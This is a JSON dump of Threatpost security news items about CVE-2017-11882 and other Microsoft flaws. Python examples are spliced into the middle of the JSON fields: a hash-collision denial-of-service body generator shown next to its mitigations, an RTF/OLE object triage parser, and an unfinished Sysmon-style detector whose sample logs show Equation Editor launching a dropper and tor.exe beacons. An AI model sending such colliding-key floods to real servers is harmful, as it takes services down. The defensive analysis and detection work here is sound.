An attacker could potentially repeatedly issue such requests, causing performance to degrade significantly enough to cause a denial of service condition for even multi-core servers or clusters of servers,\u201d [Microsoft\u2019s Suha Can and Jonathan Ness said](<https://blogs.technet.com/b/srd/archive/2011/12/27/more-information-about-the-december-2011-asp-net-vulnerability.aspx?Redirected=true>) in a blog post about the problem.\n\nThe root cause of the problem is that when ASP.NET comes across a form submission with some specific characteristics, it has to perform a huge amount of computation that can consume all of the server\u2019s resources.\n", "cvss3": {}, "published": "2012-01-09T16:00:19", "type": "threatpost", "title": "Exploit Code Released for ASP.NET Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:33:02", "id": "THREATPOST:D58796CB8261B361ADF389131F955AE3", "href": "https://threatpost.com/exploit-code-released-aspnet-flaw-010912/76073/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:55:18", "description": "Microsoft is warning of an innovative new technique attackers are using to sneak macro malware past virus detection engines, adding to the already huge uptick in reported macro attacks.\n\nAccording to researchers at Microsoft\u2019s Malware Protection Center, they stumbled upon the macro technique in a file containing VBA project scripts with a sample of well-known malicious macro malware called [TrojanDownloader:O97M/Donoff](<https://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=TrojanDownloader:O97M/Donoff>). 
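Returning to the ASP.NET denial of service described above: the following is an added example written for this page, not the HybrisDisaster proof of concept and not Microsoft's code, showing why a single request of around 100 KB can pin a CPU core. It builds a form body whose field names all hash to the same value under an unseeded multiply-add string hash (the textbook h = h*33 + c, assumed here as a stand-in for the hash ASP.NET actually used), inserts them into a small chaining hash table while counting key comparisons, and then shows the two mitigations: a secret-keyed hash that makes collisions unpredictable, and a cap on the number of form fields per request of the kind Microsoft's December 2011 fix introduced (1000 by default). The request parser and table are toy implementations for illustration.

```python
import hashlib
import itertools

MASK32 = 0xFFFFFFFF


def djb33_hash(s: str) -> int:
    """Textbook multiply-by-33 string hash with no secret seed, standing in for
    an unseeded hash-table key function. Assumption: ASP.NET's own hash differs,
    but the 'equivalent substring' trick below adapts to any h = h*k + c hash."""
    h = 5381
    for ch in s:
        h = (h * 33 + ord(ch)) & MASK32
    return h


def colliding_keys(n_blocks: int) -> list:
    """'Ey' (69*33 + 121) and 'FX' (70*33 + 88) both add 2398 to the running
    hash, so all 2**n_blocks concatenations of such blocks collide."""
    return ["".join(p) for p in itertools.product(("Ey", "FX"), repeat=n_blocks)]


class ChainedTable:
    """Minimal separate-chaining hash table that counts key comparisons, the
    work that turns quadratic once every key lands in the same bucket."""

    def __init__(self, hash_fn, n_buckets: int = 4096):
        self.hash_fn = hash_fn
        self.buckets = [[] for _ in range(n_buckets)]
        self.comparisons = 0

    def insert(self, key: str, value: str) -> None:
        chain = self.buckets[self.hash_fn(key) % len(self.buckets)]
        for i, (k, _) in enumerate(chain):
            self.comparisons += 1
            if k == key:            # existing key: overwrite in place
                chain[i] = (key, value)
                return
        chain.append((key, value))


def keyed_hash(secret: bytes):
    """Mitigation 1: seed the hash with a per-process secret so an attacker
    cannot precompute collisions. blake2b's keyed mode serves as the keyed hash."""
    def h(s: str) -> int:
        digest = hashlib.blake2b(s.encode(), key=secret, digest_size=8).digest()
        return int.from_bytes(digest, "little")
    return h


def parse_form(body: bytes, hash_fn, max_keys: int = 1000) -> ChainedTable:
    """Toy application/x-www-form-urlencoded parser. Mitigation 2: refuse
    requests with more fields than a cap (Microsoft's December 2011 fix added a
    cap of this kind, 1000 fields by default) before any hashing happens."""
    pairs = body.split(b"&") if body else []
    if len(pairs) > max_keys:
        raise ValueError(f"{len(pairs)} form fields exceeds cap of {max_keys}")
    table = ChainedTable(hash_fn)
    for pair in pairs:
        k, _, v = pair.partition(b"=")
        table.insert(k.decode(), v.decode())
    return table


def flood_body(n_blocks: int) -> bytes:
    """The attacker's POST body: 2**n_blocks distinct field names, one hash."""
    return b"&".join(k.encode() + b"=1" for k in colliding_keys(n_blocks))


def flood_cost(body: bytes, hash_fn) -> int:
    """Key comparisons spent parsing the body when no field cap is enforced."""
    return parse_form(body, hash_fn, max_keys=1 << 30).comparisons


def rejected_by_cap(body: bytes, max_keys: int = 1000) -> bool:
    """True if the capped parser refuses the body before doing any work."""
    try:
        parse_form(body, djb33_hash, max_keys)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    body = flood_body(11)   # 2048 fields, about 50 KB; each extra block doubles
                            # the body and quadruples the unseeded cost
    print(f"{len(body)} byte body, {len(colliding_keys(11))} fields")
    print("unseeded hash:", flood_cost(body, djb33_hash), "comparisons")
    print("keyed hash:   ", flood_cost(body, keyed_hash(b"per-process-secret")), "comparisons")
    print("rejected by 1000-field cap:", rejected_by_cap(body))
```

With the unseeded hash every insert walks the whole chain, so 2048 fields cost 2048*2047/2 comparisons and one more block (a body twice the size) costs four times as much; with the keyed hash the count stays near the bucket average whatever the input, and the field cap rejects the request before the first hash is computed.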
It wasn\u2019t the malware that piqued Microsoft\u2019s interest; it was the attacker\u2019s never-before-seen obfuscation technique.\n\nIt wasn\u2019t immediately obvious that the macro file was actually malicious, wrote Marianne Mallen and Wei Li, both antivirus researchers at the Microsoft Malware Protection Center, who co-authored [a blog post](<https://blogs.technet.microsoft.com/mmpc/2016/05/17/malicious-macro-using-a-sneaky-new-trick/>) earlier this week on their discovery. \u201cIt [was] a Word file that contains seven VBA modules and a VBA user form with a few buttons (using the CommandButton elements),\u201d wrote both authors.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2016/05/06235606/macro-form.png>)\n\nThe VBA user form contains three buttons. One of the buttons contained the encrypted URL.\n\nThe researchers said at first the VBA modules looked legit. \u201cNo malicious code found there \u2026 However, after further investigation we noticed a strange string in the Caption field for CommandButton3 in the user form,\u201d the researchers wrote.\n\nAs it turned out, the attackers were hiding the malware\u2019s download location using a \u201csneaky new trick.\u201d Upon further inspection, Microsoft said the attacker stored commands inside the name of a macro button. When the macro was executed it was directed to decrypt the data string used to name the macro button. Contained in the data string were commands to visit a specific URL from which the malware could be downloaded onto the targeted computer.\n\n\u201cThe macro will connect to the URL (hxxp://clickcomunicacion.es/<uniqueid>) to download a payload which we detect as Ransom:Win32/Locky,\u201d Microsoft wrote.\n\n\u201cAfter the macro runs, it is instructed to find the button and extract the (button\u2019s) name. Next, take that string (or the button\u2019s name) and decrypt it. 
Then the URL downloads the executable,\u201d commented Ryan Olson, a researcher at Palo Alto Networks, in an interview with Threatpost. Olson said he has never seen this technique before, but there is nothing remarkable about the macro. \u201cThe Microsoft find is yet another iteration of a macro that uses a slightly different technique to evade detection.\u201d He said the technique is slick, but par for the course in the whack-a-mole arms race to trick and detect macros.\n\nAccording to Palo Alto Networks, macro attacks are on the rise. This year the company has recorded 1.2 million instances of the Bartallex family of malware delivered via malicious macro documents, up from 100,000 instances of Bartallex family macro malware last year.\n\n\u201cWe suspect that macro-based attacks are experiencing a resurgence from the late 1990s. There is a whole new pool of victims that don\u2019t remember how dangerous macros were and are learning the hard way to never trust macros unless sent from a 100 percent reliable source,\u201d Olson said.\n", "cvss3": {}, "published": "2016-05-21T09:00:53", "type": "threatpost", "title": "Microsoft Warns of Sneaky New Macro Trick", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2016-05-23T15:32:11", "id": "THREATPOST:42FDB1238D348C4F4A1074DB3091E6F2", "href": "https://threatpost.com/microsoft-warns-of-sneaky-new-macro-trick/118227/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:13", "description": "Problems with [a security update issued this week by Microsoft](<https://threatpost.com/microsoft-patches-old-stuxnet-bug-freak-vulnerability/111565>) have surfaced on a number of technology forums.\n\nWindows users say [Microsoft Security Advisory 3033929](<https://technet.microsoft.com/en-us/library/security/3033929.aspx>), which adds SHA-2 code-signing and verification support for Windows 7 client machines and Windows Server 
2008 R2 boxes, is causing computers to enter an infinite reboot loop.\n\nA request for comment from Microsoft was not returned in time for publication. It is not clear whether or when Microsoft will pull the update back for repairs as it has with other [faulty](<https://threatpost.com/microsoft-yet-to-deliver-fix-for-faulty-patch-tuesday-update/107809>) [patches](<https://threatpost.com/microsoft-fixes-broken-security-patch-ms14-045/107953>).\n\n\u201cAfter installation the PC reboots, but during the boot up configuration of the patch it fails and Windows starts, reverting the configuration and reboots,\u201d said one poster on a Microsoft-sponsored [Windows forum](<http://answers.microsoft.com/en-us/windows/forum/windows_7-windows_update/kb3033929-fails-to-install-and-cause-a-minor/4c56d5d5-a66c-4865-8ccb-d36f7c314c33>). \u201cAnd then it starts all over again a couple of times until it eventually boots into Windows.\u201d\n\nNine others on that one forum posted a reply noting the same problem almost verbatim.\n\nTuesday\u2019s update notes say that it supersedes a similar update from October and addresses the issues customers had with that installation, Microsoft said. Windows 8, 8.1, RT, RT 8.1, Windows Server 2012 and Windows Server 2012 R2 already have SHA-2 support built in. Windows Server 2003, Vista and Windows Server 2008 will not receive similar support, Microsoft said.\n\nThe SHA-1 algorithm has long been considered weak, obsolete and dangerous to deploy, with [collision attacks against it considered practical by 2018](<threatpost.com/sha-1-hash-collision-could-be-within-reach-attackers-2018-100512/77088>). Microsoft itself formally recommended that [developers stop using SHA-1](<https://threatpost.com/microsoft-warns-customers-away-from-sha-1-and-rc4/102902>) two years ago, and deprecate other weak crypto such as RC4. 
By January, Microsoft developers will no longer be allowed to use SHA-1 in code signing or developer certs.\n\nBrowser makers such as Mozilla and Google have also shunned the use of SHA-1. Mozilla, last September, [formally asked Certificate Authorities and websites to upgrade certificates to SHA-256, SHA-384 or SHA-512](<https://threatpost.com/mozilla-latest-to-part-ways-with-sha-1/108495>), all of which offer substantially larger digests and security margins than SHA-1, and announced that SHA-1 should not be trusted after Jan. 1, 2017.\n\nGoogle, meanwhile, [phased out SHA-1 usage in its Chrome](<https://threatpost.com/google-sunsetting-weak-sha-1-crypto-algorithm/108145>) browser starting last November with Chrome 40. Since then, Chrome no longer fully trusts sites whose certificate chains contain SHA-1 signatures and extend beyond Jan. 1, 2017. Sites with SHA-1 certificates extending beyond that date will be trusted, but Chrome will note that they have \u201cminor errors.\u201d Starting with Chrome 40, sites with certificate chains including SHA-1 which extend beyond Jan. 
1, 2017 will be marked with a blank white sheet, the current visual display for \u201cneutral, lacking security.\u201d Chrome 41 will treat such sites as \u201caffirmatively insecure,\u201d a state indicated by a padlock with a red X on top of it and a red strike through the text that says HTTPS.\n", "cvss3": {}, "published": "2015-03-12T10:16:57", "type": "threatpost", "title": "Microsoft SHA-2 Advisory Causing 'Infinite Loop' Issues", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-03-12T14:16:57", "id": "THREATPOST:68D1078BB418B06D989E65C3972EDE28", "href": "https://threatpost.com/microsoft-sha-2-advisory-causing-infinite-loop-issues/111597/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:05:59", "description": "**[](<https://threatpost.com/katie-moussouris-microsoft-trustworthy-computing-and-evolution-security-community-031611/>)**\n\nDennis Fisher talks with Microsoft\u2019s Katie Moussouris about the way that the Trustworthy Computing effort at Microsoft has changed, how the security community has evolved since she got involved in the 1990s and the challenges\u2013and fun\u2013of being a woman in security.\n\n*Podcast audio courtesy of [sykboy65](<http://www.youtube.com/watch?v=Z8fMm3sm_ww&feature=channel_page>)\n\nSubscribe to the Digital Underground podcast on [](<http://itunes.apple.com/WebObjects/MZStore.woa/wa/viewPodcast?id=315355232>)\n", "cvss3": {}, "published": "2011-03-16T15:12:29", "type": "threatpost", "title": "Katie Moussouris on Microsoft, Trustworthy Computing and the Evolution of the Security Community", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-07-24T18:59:56", "id": "THREATPOST:D6D859A31F73B00E9B6F642D4C89B344", "href": "https://threatpost.com/katie-moussouris-microsoft-trustworthy-computing-and-evolution-security-community-031611/75032/", "cvss": {"score": 9.3, "vector": 
"AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-30T05:51:18", "description": "After staying dormant for few years, the Kronos banking trojan resurfaced in July in a form dubbed Osiris. A wider analysis of how the banking trojan is evolving shows innovative development on the part of its authors, with an eye to broader malware trends.\n\nOsiris [first appeared in July](<https://threatpost.com/kronos-banking-trojan-resurfaces-after-years-of-silence/134364/>) in three distinct campaigns targeting Germany, Japan and Poland over the summer. It was clear that it\u2019s based off of the [Kronos malware](<https://threatpost.com/new-kronos-banking-malware-advertised-on-russian-forums/107210/>) which led the financial crime pack for many quarters after it surfaced in 2014 (it is itself a descendant of the infamous [Zeus banking code](<https://threatpost.com/versatility-of-zeus-framework-encourages-criminal-innovation/106638/>)).\n\nWhile the behaviors exhibited by the newly spawned banking trojan are similar to many other prevalent banking malware (for instance, it implements Zeus-style G/P/L web-injects, a keylogger and a VNC server, according to Securonix researcher Oleg Kolesnikov), there are also significant differences.\n\nFor one, it uses encrypted Tor traffic for command-and-control (C2). \u201cThe malicious payload spawns multiple processes named \u2018tor.exe\u2019 and connects to multiple distinct host (Tor nodes) located in different countries,\u201d Kolesnikov said in [a post](<https://www.securonix.com/securonix-threat-research-kronos-osiris-banking-trojan-attack>) Tuesday on Osiris.\n\nAlso, Osiris has upped the game on evasion efforts. 
As Kolesnikov explained in an interview with Threatpost, \u201cOne of the new aspects of Osiris that are particularly notable is a fairly innovative legitimate process impersonation technique.\u201d He added that this evasion technique combines the recently pioneered [process-doppelganging approach](<https://www.blackhat.com/docs/eu-17/materials/eu-17-Liberman-Lost-In-Transaction-Process-Doppelganging.pdf>) with the more traditional [process-hollowing](<https://threatpost.com/mylobot-botnet-emerges-with-rare-level-of-complexity/132967/>) technique.\n\n\u201cThis can potentially make detection of the banking trojan\u2019s activity using purely endpoint tools more challenging compared to tools that are capable of looking at the behaviors of other entities besides endpoints\u2026[such as] network and user information,\u201d he said.\n\n**The Attack Pattern**\n\nThe primary infiltration vector that has so far been [seen in the wild](<https://research.checkpoint.com/osiris-enhanced-banking-trojan>) for Osiris is spam email. These contain specially crafted Microsoft Word documents/RTF attachments with macro/OLE content that cause malicious obfuscated VB stages to be dropped and executed. In many scenarios, the malware is distributed using exploit kits like RIG EK, the analysis showed.\n\nThe malicious document exploits a well-known buffer overflow vulnerability in the Microsoft Office Equation Editor component ([CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>)) which allows the attacker to perform arbitrary code execution.\n\n\u201cThe vulnerability resides in the Equation Editor Component which, when used, runs as its own process (eqnedt32.exe),\u201d Kolesnikov explained. \u201cBecause of the way it was implemented, it doesn\u2019t support Data Execution Prevention (DEP) and Address Space Layout Randomization (ASLR). 
A malicious document exploits the vulnerability to execute a command to download the latest version of [Osiris].\u201d\n\nOsiris, like other banking trojans, is mainly aimed at stealing credentials and other sensitive data from online banking accounts. The primary method of collection is a man-in-the-browser attack that web-injects malicious script into banking websites and grabs form values.\n\n**A Thoroughly Modern Malware**\n\nNotably, Osiris\u2019 fundamental makeup positions it at the forefront of malware trends, despite being based on old source code that\u2019s been knocking around for years.\n\n\u201cBased on the banking attacks we are seeing in the wild, there appears to be a growing trend towards a convergence of malicious features offered by many trojans,\u201d Kolesnikov told Threatpost. \u201cFor instance, it is quite common to see the same baseline set of features offered in many prevalent bank trojans, such as form-grabbing, sandbox and AV bypass, web injections, password recovery, keylogging and remote access.\u201d\n\nHe added that the latest version of Osiris also fits into a trend of malware adopting [a more modular architecture](<https://threatpost.com/bad-actors-sizing-up-systems-via-lightweight-recon-malware/137364/>) in general; this enables malicious actors to provide updates and plugins to implement various malicious behaviors after an initial infection.\n\nThis dovetails with \u201ca growing trend for more rapid malware prototyping and a decrease in the \u2018research-to-malware\u2019 time it takes for malicious threat actors to implement the latest attack and evasion techniques reported in the security community,\u201d he added.\n\nUnfortunately, Osiris is poised to become more widespread, given that its pricing on the Dark Web lowers the barrier to entry for bad actors.\n\n\u201cAnother aspect is that Osiris is relatively cheaper compared to Kronos, which was sold for $3,000 in 2014, compared to Osiris that is sold for $2,000 in 
2018, making it potentially more accessible to more cybercriminals,\u201d Kolesnikov told us. \u201cAlso, Osiris authors offered an option of reselling the license for $1,000 (not offered for Kronos), which can potentially further increase the scale and impact of the malicious threat.\u201d\n", "cvss3": {}, "published": "2018-09-12T16:12:55", "type": "threatpost", "title": "Osiris Banking Trojan Displays Modern Malware Innovation", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-09-12T16:12:55", "id": "THREATPOST:43B03902EBB289EABEA3B61E32BF7B7B", "href": "https://threatpost.com/osiris-banking-trojan-displays-modern-malware-innovation/137393/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-23T13:53:38", "description": "While most malicious e-mail campaigns use Word documents to hide and spread malware, a recently discovered campaign uses a malicious PDF file and a 22-year-old Office bug to propagate the Snake Keylogger malware, researchers have found.\n\nThe campaign\u2014discovered by researchers at HP Wolf Security\u2014aims to dupe victims with an attached PDF file purporting to have information about a remittance payment, according to [a blog post](<https://threatresearch.ext.hp.com/pdf-malware-is-not-yet-dead/>) published Friday. Instead, it loads the info-stealing malware, using some tricky evasion tactics to avoid detection.\n\nAttackers keep favouring these document formats for a reason, the post notes. \u201cThe reasons are clear: users are familiar with these file types, the applications used to open them are ubiquitous, and they are suited to social engineering lures,\u201d HP Wolf Security\u2019s Schlapfer wrote.\n\nStill, while the new campaign does use PDF in the file lure, it later employs Microsoft Word to deliver the ultimate payload\u2014the Snake Keylogger, researchers found. 
Snake Keylogger is .NET malware that first appeared in late 2020 and is aimed at stealing sensitive information from a victim\u2019s device, including saved credentials, the victim\u2019s keystrokes, screenshots of the victim\u2019s screen, and clipboard data, [according to Fortinet](<https://www.fortinet.com/blog/threat-research/deep-dive-into-a-fresh-variant-of-snake-keylogger-malware>).\n\n## **\u2018Unusual\u2019 Campaign**\n\nThe HP Wolf Security team noticed a new PDF-based threat campaign on March 23 with an \u201cunusual infection chain,\u201d involving not just a PDF but also \u201cseveral tricks to evade detection, such as embedding malicious files, loading remotely-hosted exploits and shellcode encryption,\u201d Schlapfer wrote.\n\nAttackers target victims with emails that include a PDF document named \u201cREMMITANCE INVOICE.pdf\u201d (misspelling intended) as an attachment. If someone opens the file, Adobe Reader prompts the user to open a .docx file with a rather curious name, researchers found.\n\n\u201cThe attackers sneakily named the Word document \u201chas been verified. However PDF, Jpeg, xlsx, .docx\u201d to make it look as though the file name was part of the Adobe Reader prompt,\u201d according to the post.\n\nThe .docx file is stored as an EmbeddedFile object within the PDF and opens Microsoft Word if clicked on, researchers found. 
If Protected View is disabled, Word downloads a Rich Text Format (.rtf) file from a web server, which is then run in the context of the open document.\n\nResearchers unzipped the .docx, which is an Office Open XML archive, and found a URL in its \u201cdocument.xml.rels\u201d relationships file pointing to a domain that has no business appearing in a legitimate Office document, they said.\n\n## **17-Year-Old Bug Exploited**\n\nConnecting to this URL leads to a redirect and then downloads an RTF document called \u201cf_document_shp.doc.\u201d This document contained two \u201cnot well-formed\u201d OLE objects that revealed shellcode exploiting [CVE-2017-11882](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2017-11882>), which researchers said is an \u201cover four-years-old\u201d remote code execution (RCE) vulnerability in Equation Editor.\n\nEquation Editor is an application installed by default with the Office suite that is used to insert and edit complex equations as Object Linking and Embedding (OLE) items in Microsoft Word documents.\n\nIt turns out, however, that the bug attackers leverage in the campaign is one that Microsoft patched more than four years ago ([in 2017](<https://threatpost.com/microsoft-patches-17-year-old-office-bug/128904/>), to be exact) but that had existed for some 17 years before that, making it 22 years old now.\n\nAs the final act of the attack, researchers found shellcode stored in the \u201cOLENativeStream\u201d structure at the end of one of the OLE objects they examined. 
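An added example of the first triage step a responder would run on an RTF like the one described above (written for this page; not HP Wolf Security's or Threatpost's code): pull every \objdata group, hex-decode it, and parse the OLE 1.0 object header so that the class name (Equation.3 is Equation Editor) and the declared-versus-actual native data size are visible without ever opening the file in Word. The RTF it parses is constructed inside the block: a harmless embedded Word object, an intact Equation.3 object whose payload is filler bytes, and a truncated copy of it that fails the size check the way a "not well-formed" object would. No exploit data is included, and the verdict is a triage heuristic, not a CVE-2017-11882 signature.

```python
import re
import struct

OLE1_VERSION = 0x0501   # value seen at the start of OLE 1.0 object headers
FORMAT_EMBEDDED = 2     # FormatID 2 = embedded object, 1 = linked object


def _lp(s: bytes) -> bytes:
    """LengthPrefixedAnsiString: 4-byte length (counting the NUL), then bytes."""
    return struct.pack("<I", 0) if not s else struct.pack("<I", len(s) + 1) + s + b"\0"


def build_ole1(class_name: bytes, native: bytes) -> bytes:
    """Embedded OLE 1.0 object: header, empty topic/item names, size, payload."""
    return (struct.pack("<II", OLE1_VERSION, FORMAT_EMBEDDED) + _lp(class_name)
            + _lp(b"") + _lp(b"") + struct.pack("<I", len(native)) + native)


def _objdata_group(blob: bytes, objclass: str, wrap: bool = False) -> str:
    hexdata = blob.hex()
    if wrap:  # writers commonly break objdata hex across lines
        hexdata = "\n".join(hexdata[i:i + 64] for i in range(0, len(hexdata), 64))
    return "{\\object\\objemb{\\*\\objclass %s}{\\*\\objdata %s}}" % (objclass, hexdata)


# Constructed sample document (not the campaign's f_document_shp.doc): a harmless
# embedded Word object, an intact Equation.3 object whose payload is filler, and
# the same Equation.3 object truncated so its declared size no longer matches.
_EQ_OBJ = build_ole1(b"Equation.3", b"\x00" * 64)
SAMPLE_RTF = "{\\rtf1\\ansi\\deff0\n" + "\n".join([
    _objdata_group(build_ole1(b"Word.Document.8", b"hello"), "Word.Document.8"),
    _objdata_group(_EQ_OBJ, "Equation.3", wrap=True),
    _objdata_group(_EQ_OBJ[:-20], "Equation.3"),
]) + "\n\\par }"


def _group_body(rtf: str, start: int) -> str:
    """Text from start up to the '}' that closes the enclosing RTF group."""
    depth, out = 0, []
    for ch in rtf[start:]:
        if ch == "{":
            depth += 1
        elif ch == "}":
            if depth == 0:
                break
            depth -= 1
        out.append(ch)
    return "".join(out)


def extract_objdata(rtf: str) -> list:
    """Decoded bytes of every \\objdata group; control words and whitespace in the
    group are dropped before hex-decoding and an odd trailing nibble is ignored."""
    blobs = []
    for m in re.finditer(r"\\objdata(?![A-Za-z])", rtf):
        body = re.sub(r"\\\*?[A-Za-z]+-?\d*\s?", "", _group_body(rtf, m.end()))
        hexdata = re.sub(r"[^0-9A-Fa-f]", "", body)
        blobs.append(bytes.fromhex(hexdata[: len(hexdata) & ~1]))
    return blobs


def _lp_string(buf: bytes, off: int):
    (n,) = struct.unpack_from("<I", buf, off)
    off += 4
    if n > len(buf) - off:
        raise ValueError("length-prefixed string runs past end of object")
    return buf[off:off + n].split(b"\0", 1)[0].decode("latin-1"), off + n


def parse_ole1(blob: bytes) -> dict:
    """Parse an OLE 1.0 ObjectHeader (plus NativeData when embedded).
    Raises ValueError or struct.error on truncated input."""
    version, fmt = struct.unpack_from("<II", blob, 0)
    class_name, off = _lp_string(blob, 8)
    _topic, off = _lp_string(blob, off)
    _item, off = _lp_string(blob, off)
    info = {"ole_version": version, "format_id": fmt, "class_name": class_name}
    if fmt == FORMAT_EMBEDDED:
        (size,) = struct.unpack_from("<I", blob, off)
        off += 4
        info["declared_native_size"] = size
        info["actual_native_size"] = len(blob) - off
        info["native_data"] = blob[off:off + size]
    return info


def triage_rtf(rtf: str) -> list:
    """One finding per object: anything naming Equation Editor as its class, or
    failing to parse cleanly, goes to detonation; the rest to analyst review."""
    findings = []
    for idx, blob in enumerate(extract_objdata(rtf)):
        f = {"object": idx, "bytes": len(blob), "equation_editor": False, "well_formed": False}
        try:
            info = parse_ole1(blob)
            f["class_name"] = info["class_name"]
            f["equation_editor"] = info["class_name"].lower().startswith("equation.")
            f["well_formed"] = (info["format_id"] != FORMAT_EMBEDDED
                                or info["declared_native_size"] == info["actual_native_size"])
        except (ValueError, struct.error) as exc:
            f["error"] = str(exc)
        f["verdict"] = "detonate" if f["equation_editor"] or not f["well_formed"] else "review"
        findings.append(f)
    return findings
```

Calling triage_rtf(SAMPLE_RTF) yields three findings: the Word object parses cleanly and goes to review, the intact Equation.3 object is well-formed but still routed to detonation because of its class, and the truncated copy fails the size check. On a real sample the class check is the cheap, high-signal part: Equation Editor objects have had no legitimate reason to arrive in e-mail since Microsoft removed the component in 2018, so their presence alone justifies sandboxing before anyone opens the file.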
The code eventually decrypts a ciphertext that turns out to be more shellcode, which is then executed and leads to an executable called _fresh.exe_ that loads the Snake Keylogger, researchers found.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-05-23T12:07:56", "type": "threatpost", "title": "Snake Keylogger Spreads Through Malicious PDFs", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882"], "modified": "2022-05-23T12:07:56", "id": "THREATPOST:384A1D8040B61120BE2BA529493B9871", "href": "https://threatpost.com/snake-keylogger-pdfs/179703/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T23:09:40", "description": "There is an unpatched flaw in Microsoft SQL Server that could enable an attacker to access users\u2019 passwords on the database server. The vulnerability is in SQL Server 2000, 2005 and 2008.\n\nThe SQL Server vulnerability was discovered last fall by database-security vendor Sentrigo, which then reported the problem to Microsoft. 
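Both infection chains above, Osiris and the Snake Keylogger campaign, pass through the same choke point: Equation Editor (eqnedt32.exe) exploited via CVE-2017-11882 to fetch and run an executable, and in Osiris' case a burst of tor.exe processes for command and control. The following added example (mine, not Securonix's, HP's or Threatpost's code) runs three endpoint rules over Sysmon-style process-creation and network-connection telemetry: a high-severity hit whenever eqnedt32.exe is the parent of any process, a low-severity note whenever it starts at all, and a medium-severity hit when one parent spawns several tor.exe processes. The log lines, paths, PIDs and RFC 5737 test addresses are constructed inline and are not indicators from either analysis, and the field names are simplified rather than Sysmon's real schema. One caveat the rule encodes: Equation Editor is launched over DCOM, so its parent in process telemetry is svchost.exe, not WINWORD.EXE.

```python
import json
from collections import defaultdict
from pathlib import PureWindowsPath

SVCHOST = r"C:\Windows\System32\svchost.exe"
EQNEDT = r"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"
TOR = r"C:\Users\alice\AppData\Roaming\osr\tor.exe"
DROPPER = r"C:\Users\alice\AppData\Local\Temp\upd.exe"


def _ev(eid: int, **fields) -> str:
    return json.dumps({"eid": eid, **fields})


# Constructed sample telemetry (Sysmon-style: eid 1 = process create, eid 3 =
# network connect; field names simplified). Paths, PIDs and RFC 5737 addresses
# are invented; none of it is an indicator from the Osiris or Snake analyses.
SAMPLE_LOG = "\n".join([
    _ev(1, pid=812, image=SVCHOST, parent_image=r"C:\Windows\System32\services.exe",
        cmdline="svchost.exe -k DcomLaunch"),
    _ev(1, pid=5208, image=EQNEDT, parent_image=SVCHOST, cmdline="EQNEDT32.EXE -Embedding"),
    _ev(1, pid=5320, image=r"C:\Windows\System32\cmd.exe", parent_image=EQNEDT,
        cmdline=r'cmd /c "%TEMP%\upd.exe"'),
    _ev(1, pid=6001, image=TOR, parent_image=DROPPER, cmdline="tor.exe"),
    _ev(1, pid=6002, image=TOR, parent_image=DROPPER, cmdline="tor.exe"),
    _ev(1, pid=6003, image=TOR, parent_image=DROPPER, cmdline="tor.exe"),
    _ev(3, pid=6001, image=TOR, dst_ip="198.51.100.7", dst_port=9001),
    _ev(3, pid=6002, image=TOR, dst_ip="203.0.113.21", dst_port=443),
    _ev(3, pid=6003, image=TOR, dst_ip="192.0.2.44", dst_port=9001),
])

# Constructed benign baseline: a genuine equation object starts Equation Editor
# (again under svchost.exe) but it spawns nothing; Tor Browser starts one tor.exe.
BENIGN_LOG = "\n".join([
    _ev(1, pid=5300, image=EQNEDT, parent_image=SVCHOST, cmdline="EQNEDT32.EXE -Embedding"),
    _ev(1, pid=7100, image=r"C:\Tor Browser\Browser\TorBrowser\Tor\tor.exe",
        parent_image=r"C:\Tor Browser\Browser\firefox.exe", cmdline="tor.exe -f torrc"),
    _ev(3, pid=7100, image=r"C:\Tor Browser\Browser\TorBrowser\Tor\tor.exe",
        dst_ip="198.51.100.7", dst_port=9001),
])


def _name(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def detect(log_text: str, tor_threshold: int = 3) -> list:
    """Run three rules over JSON-lines telemetry and return alert dicts."""
    alerts = []
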